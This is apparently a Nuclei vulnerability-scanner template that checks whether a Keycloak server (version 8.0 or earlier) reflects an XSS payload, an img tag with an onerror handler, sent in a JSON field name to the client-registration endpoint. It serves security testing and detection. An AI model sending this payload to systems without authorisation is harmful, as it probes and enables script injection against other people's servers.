id: keycloak-xss

info:
  name: Keycloak <= 8.0 - Cross Site Scripting
  author: incogbyte
  severity: info
  reference: https://cure53.de/pentest-report_keycloak.pdf
  tags: keycloak,xss

http:
  - raw:
      - |
        POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"<img onerror=confirm(1337) src/>":1}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 400

      - type: word
        words:
          - 'Unrecognized field "<img onerror=confirm(1337) src/>"'